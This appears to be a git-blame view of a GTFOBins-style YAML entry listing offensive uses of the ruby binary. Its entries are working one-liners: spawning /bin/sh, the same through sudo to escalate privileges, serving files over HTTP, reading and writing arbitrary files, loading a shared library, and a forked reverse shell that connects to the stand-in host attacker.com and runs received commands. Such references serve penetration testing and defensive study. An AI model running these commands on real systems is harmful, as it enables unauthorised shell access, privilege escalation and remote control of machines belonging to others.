2018-05-21 21:14:41 +02:00
|
|
|
---
|
|
|
|
functions:
|
2018-05-25 15:30:02 +02:00
|
|
|
execute-interactive:
|
2018-05-21 21:14:41 +02:00
|
|
|
- code: ruby -e 'exec "/bin/sh"'
|
|
|
|
sudo-enabled:
|
|
|
|
- code: sudo ruby -e 'exec "/bin/sh"'
|
2018-05-22 22:22:20 +02:00
|
|
|
upload:
|
|
|
|
- description: Serve files in the local folder running an HTTP server.
|
|
|
|
code: |
|
|
|
|
export LPORT=8888
|
|
|
|
ruby -run -e httpd . -p $LPORT
|
2018-05-25 15:30:02 +02:00
|
|
|
reverse-shell-interactive:
|
2018-05-24 22:05:07 +02:00
|
|
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
2018-05-22 22:22:20 +02:00
|
|
|
code: |
|
2018-05-24 21:59:21 +02:00
|
|
|
export RHOST=attacker.com
|
2018-05-23 09:08:13 +02:00
|
|
|
export RPORT=12345
|
2018-05-21 21:14:41 +02:00
|
|
|
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
2018-05-28 19:25:55 +02:00
|
|
|
file-read:
|
|
|
|
- code: ruby -e 'puts File.read("file_to_read")'
|
|
|
|
file-write:
|
|
|
|
- code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("data") }'
|
2018-05-21 21:14:41 +02:00
|
|
|
load-library:
|
|
|
|
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
|
2018-05-25 01:10:39 +02:00
|
|
|
---
|